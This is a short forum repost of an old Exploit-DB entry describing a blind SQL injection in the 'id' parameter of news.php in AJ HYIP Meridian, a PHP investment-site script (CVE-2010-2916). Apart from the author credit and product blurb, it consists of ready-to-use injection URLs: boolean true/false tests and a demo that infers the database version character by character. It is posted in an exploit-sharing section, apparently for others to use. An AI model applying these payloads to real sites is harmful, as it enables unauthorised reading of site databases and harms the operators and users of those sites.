Exploit AJ HYIP MERIDIAN - 'news.php?id' Blind SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
14436
Проверка EDB
  1. Пройдено
Автор
JOSS
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2010-2916
Дата публикации
2010-07-22
Код:
AJ HYIP MERIDIAN (news.php id) Blind SQL Injection Vulnerability
bug found by Jose Luis Gongora Fernandez (a.k.a) JosS

contact: sys-project[at]hotmail.com
website: http://www.hack0wn.com/

- site: http://www.ajsquare.com/products/ajhyip/index.php

- about AJ HYIP:

AJ HYIP is a complete financial tool with no technical 
knowledge required to manage the site. AJ HYIP software 
is the latest and most advanced HYIP Script with excellent 
navigation features. Our HYIP Script can be easily customized 
to accustom your needs with a potential to generate heavy revenues.


~~ [POC]

http://target/path/news.php?id=1 [bSQL]
http://target/path/news.php?id=1 and 1=1
http://target/path/news.php?id=1 and 1=2

~~ [DEMO]

http://server/meridian/news.php?id=1 and substring(@@version,1,1)=4
http://server/meridian/news.php?id=1 and substring(@@version,1,1)=5


 __h0__
 
Источник
www.exploit-db.com

Похожие темы